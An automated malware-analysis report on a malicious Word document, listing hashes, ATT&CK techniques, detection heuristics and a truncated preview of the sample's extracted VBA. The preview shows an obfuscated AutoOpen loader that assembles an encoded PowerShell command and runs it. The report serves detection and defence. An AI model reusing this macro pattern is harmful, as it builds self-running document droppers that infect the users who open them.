Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f1dfd2693fc5dd65…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 95.0 KB
Created: 2018-07-06 07:20:00
Authoring application: Microsoft Office Word
First seen: 2018-07-23
MD5: c380591108a7934007330071cb35b11a
SHA-1: 6e078c7fbd399a314e965118a3db71d742f13d8d
SHA-256: f1dfd2693fc5dd6581cf6695148263998833f7082e98012a3e6bad3fd02aab0a
Risk score: 282

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File
  • T1566.001 Phishing: Spearphishing Attachment

The sample contains a critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER heuristic, indicating an obfuscated auto-executing VBA loader. The AutoOpen macro is present and uses CreateObject and Shell calls, which are critical findings. The script attempts to construct and execute a PowerShell command, evidenced by the string concatenation 'wersh' + 'ell ' and a second obfuscated string that likely represents arguments or a command to be executed by PowerShell.

Heuristics (8)

  • VBA macros detected (severity: medium; 5 related findings; ID: OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA (severity: critical; ID: OLE_VBA_SHELL)
    Shell() call in VBA
  • Obfuscated auto-exec VBA loader (severity: critical; ID: OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER)
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro (severity: high; ID: OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • CreateObject call (severity: high; ID: OLE_VBA_CREATEOBJ)
    CreateObject call
  • VBA p-code auto-exec with execution tokens (severity: high; ID: OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker (severity: medium; ID: OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (severity: info; ID: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 9709 bytes
SHA-256: d1b63dc7f6337e4d287721a439f6862c198a9a07880564d047c847d69416005f

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "zEujVzCVV"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
   TcFwIi = qOImLr * VqFLU / Qprbi - HMvuDR + (77289 / sSUjB) / 87808 - 16661
   lVQQnV = GhoRth * aHwQVB / uLvah - YoRzZ + (35232 / GTuDV) / 33154 - 69045
   RjsPJY = PFPNP * liUTXT / TEUWdQ - WVKaI + (79258 / avlaz) / 76989 - 67235
   PnORTZ = iFHTp * NOdcG / DGisoK - ImclN + (14530 / zfEEnp) / 60080 - 57281
   TInNj = oFSsk * NVXpW / hpwJU - GtZHqA + (19651 / TklRlz) / 99056 - 36112
   awOhp = iWpjQ * LVlsV / uvoEaZ - jisZf + (22625 / GSwiCV) / 61945 - 11870
bmuaOlrwv (ZsASoAjo + wUcYPJdYwr + ffVFUHcIvOf)
   TDEFa = MzZZm * JoLHq / hPSiwj - kGDYHO + (70872 / wBYBnw) / 350 - 56796
End Sub


Attribute VB_Name = "OjdbdaqIcXEv"
Function ZsASoAjo()
On Error Resume Next
VrqiO = (26887 + AHlwz - (78266 * cMqJiO - 16082 + 23503))
   vaZnO = (73290 + SLflN - (2264 * SwnFFr - 17924 + 49467))
   mslmHc = (84636 + sTSXv - (51203 * zIkFP - 63238 + 37258))
Kpbzc = "wersh" + "ell " + "         " + "    " + "    " + Chr(40) + " '101" + "_19P24" + "~3-124i4" + "7B36" + "B54<108k" + "46k3"
XGfwT = (66649 + JObsaZ - (39370 * bjjhV - 48365 + 83859))
   tAzvTw = (17558 + MrWcjs - (60139 * cGVfFQ - 30816 + 11622))
   VihjY = (22738 + jfIsGu - (73652 * mrzMLt - 13031 + 19599))
   EMnJX = (55401 + tOOaCQ - (30340 * nfadD - 1128 + 3238))
PjvDhZYai = "5%43~36~" + "34<53<97<" + "15<36-5" + "3i111" + "-22P36i35" + "<2w45k40"
oWHPU = (26136 + iWhSI - (74214 * bIwtqn - 58817 + 20273))
   pwNXWC = (59775 + osvDUC - (65216 * WIXRst - 77080 + 84189))
   kBwtBv = (20873 + KUNIf - (47753 * ihqfA - 53500 + 26571))
cGKZWBXFdIo = "i36<47~5" + "3_122%101" + "w4B54w46%" + "124%102~" + "41i53%53" + "B49<123~" + "110k11" + "0<54"
GoicX = (42793 + ODQAQU - (74383 * jPXtFQ - 10342 + 24259))
   kvuBYW = (58409 + IfSRcd - (51829 * wzRbT - 56386 + 48929))
NvYcAlrqKqw = "P54i54k" + "111~34B" + "51i36w" + "36<37i" + "34<51k3" + "2-39i53P1" + "11k4" + "7-36" + "~53i110B4" + "6%59B1" + "6i38_25B"
GfPrA = (53441 + wsGcIh - (18596 * qbUQjw - 74284 + 70804))
   PDFWHV = (49133 + SizQkI - (73349 * YMaGc - 21573 + 37449))
   jzdXC = (9055 + NSAqKB - (33805 * ZSsCJ - 88618 + 83179))
bFJwpN = "52k120-1" + "10<1%41" + "%53B53i" + "49k123w11" + "0k110_5" + "4B54" + "i54k11" + "1k34k46-" + "40-44i3" + "5<51k" + "32k38%32B" + "51%34~40"
BqDIF = (37711 + vdTcwa - (79813 * svOIo - 62431 + 48655))
BaahvHGuJ = "~32<111%3" + "2~37%55%" + "111w35%5" + "1%110w" + "40-41P" + "56B25w5<" + "47P114-41" + "_9P36B1" + "10i1~"
fuiJT = (80114 + hIBNjE - (24952 * vOYzid - 84446 + 4864))
dCCRLC = "41k53i" + "53_4" + "9k123w11" + "0k110k54" + "-54k54_11" + "1-50B" + "52<37_3" + "6<32w44<" + "35<32w45_" + "32-43B11" + "1i34" + "<46P4"
ZsASoAjo = Kpbzc + PjvDhZYai + cGKZWBXFdIo + NvYcAlrqKqw + bFJwpN + BaahvHGuJ + dCCRLC
   BFfhn = (84755 + sVMCYY - (50318 * nGnIi - 54836 + 27257))
   cuIjbn = (88028 + ZZMlKi - (60577 * SnnLr - 2995 + 53216))
   OZONGG = (52257 + PRaiO - (32484 * jftoRd - 80363 + 87612))
End Function
Function wUcYPJdYwr()
On Error Resume Next
jZCVY = (61343 + ziVMz - (11057 * nziwXD - 21541 + 14762))
   lOTKp = (74868 + jSOdUl - (27944 * jJHzrY - 79623 + 1737))
   tqrdX = (84831 + zXbsun - (55212 * awGwUa - 28336 + 44793))
   tjlNWz = (91719 + sGGNi - (20804 * ibUDsZ - 69939 + 6438))
QWBZEw = "4B110i" + "37<4" + "4%42" + "k47%1" + "10%4" + "8w56i" + "48i45B1" + "2P116" + "w7<117%11" + "0~1B41i53" + "-53i49%12" + "3i110w1"
dELliT = (74917 + vBWSQS - (28301 * lzbVOm - 69867 + 80257))
   qEhGJd = (10672 + dIEkU - (28182 * NLiBoo - 84562 + 37647))
nBCCwCHidLn = "10<54B54" + "w54B111" + "i37w36i5" + "3i50k42~" + "40i56~3" + "6%35_46" + "B45_36" + "i59i" + "47_40w11" + "1~51B5"
CAowkO = (61843 + YuQwpR - (93333 * NIvuQ - 75298 + 99635))
CKXRjHCN = "2B110i" + "10-23-9" + "<24-50_5" + "9<41_" + "54i15P1" + "10i1B41%5" + "3i
... (truncated)